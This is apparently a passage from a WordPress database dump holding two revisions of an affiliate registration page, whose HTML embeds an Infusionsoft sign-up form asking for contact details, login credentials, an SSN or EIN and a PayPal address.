(1313, 4194, '2014-07-30 09:36:57', '2014-07-30 14:36:57', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" />\r\n<input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" />\r\n<input name="infusionsoft_version" type="hidden" value="1.32.0.59" />\r\n<div class="infusion-field"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_LastName">Last Name *</label>\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_Company">Company</label>\r\n<input id="inf_field_Company" class="infusion-field-input-container" name="inf_field_Company" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_Phone1">Phone Number *</label>\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_StreetAddress1">Street Address 1 *</label>\r\n<input id="inf_field_StreetAddress1" class="infusion-field-input-container" name="inf_field_StreetAddress1" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_StreetAddress2"> Street Address 2</label>\r\n<input id="inf_field_StreetAddress2" class="infusion-field-input-container" name="inf_field_StreetAddress2" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_City"> City *</label>\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_State">State *</label>\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_PostalCode"> Postal Code *</label>\r\n<input id="inf_field_PostalCode" class="infusion-field-input-container" name="inf_field_PostalCode" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_Country">Country *</label>\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select></div>\r\n<div class="infusion-field"><label for="inf_other_Username">Username *</label>\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_other_Password">Password *</label>\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" /></div>\r\n<div class="infusion-field"><label for="inf_other_RetypePassword">Confirm Password *</label>\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" /></div>\r\n<div class="infusion-field"><label for="inf_other_NotifyOnLead">Notify on Lead</label>\r\n<div class="infusion-radio"><span class="infusion-option">\r\n<input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" />\r\n<label for="inf_other_NotifyOnLead_1">Yes</label>\r\n</span>\r\n<span class="infusion-option">\r\n<input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" />\r\n<label for="inf_other_NotifyOnLead_0">No</label>\r\n</span></div>\r\n</div>\r\n<div class="infusion-field"><label for="inf_other_NotifyOnSale">Notify on Sale</label>\r\n<div class="infusion-radio"><span class="infusion-option">\r\n<input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" />\r\n<label for="inf_other_NotifyOnSale_1">Yes</label>\r\n</span>\r\n<span class="infusion-option">\r\n<input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" />\r\n<label for="inf_other_NotifyOnSale_0">No</label>\r\n</span></div>\r\n</div>\r\n<div class="infusion-field"><label for="inf_field_SSN">SSN *</label>\r\n<input id="inf_field_SSN" class="infusion-field-input-container" name="inf_field_SSN" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_custom_EIN">EIN #</label>\r\n<input id="inf_custom_EIN" class="infusion-field-input-container" name="inf_custom_EIN" type="text" /></div>\r\n<div class="infusion-field"><span class="infusion-option">\r\n<input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" />\r\n<label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label>\r\n</span></div>\r\n<div class="infusion-field"><label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label>\r\n<input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></div>\r\n<div class="infusion-submit"><input type="submit" value="Register!" /></div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-30 09:36:57', '2014-07-30 14:36:57', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1315, 4194, '2014-07-30 09:41:31', '2014-07-30 14:41:31', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style=">\r\n\r\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01">// <![CDATA[\r\n\r\n\r\n// ]]></script>\r\n\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST" name="CYB Referall Partner Registration"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.32.0.59" />\r\n<div id="mainContent" class="simple beta-base beta-font-b" style="height: 100%;">\r\n<table class="background" style="width: 100%; height: 100%;" cellspacing="0" cellpadding="10" border="0">\r\n<tbody>\r\n<tr>\r\n<td align="center" valign="top">\r\n<table class="bodyContainer webFormBodyContainer" width="100%" cellspacing="0" cellpadding="20" bgcolor="#FFFFFF">\r\n<tbody>\r\n<tr>\r\n<td class="body" valign="top" bgcolor="#FFFFFF">\r\n<div>\r\n<div class="text">\r\n<div class="text">\r\n<div>\r\n<div><span style="color: #000000;"> </span></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_FirstName">First Name *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_LastName">Last Name *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Email">Email *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Company">Company</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Company" class="infusion-field-input-container" name="inf_field_Company" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Phone1">Phone Number *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_StreetAddress1">Street Address 1 *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_StreetAddress1" class="infusion-field-input-container" name="inf_field_StreetAddress1" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_StreetAddress2"> Street Address 2</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_StreetAddress2" class="infusion-field-input-container" name="inf_field_StreetAddress2" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_City"> City *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_State">State *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_PostalCode"> Postal Code *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_PostalCode" class="infusion-field-input-container" name="inf_field_PostalCode" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Country">Country *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div class="text">\r\n<div class="text">\r\n\r\nChoose a Username of approximately 4 to 8 letters. Enter either your SSN or EIN # below.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_other_Username">Username *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_other_Password">Password *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_other_RetypePassword">Confirm Password *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_SSN">SSN *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_SSN" class="infusion-field-input-container" name="inf_field_SSN" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_custom_EIN">EIN #</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_custom_EIN" class="infusion-field-input-container" name="inf_custom_EIN" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 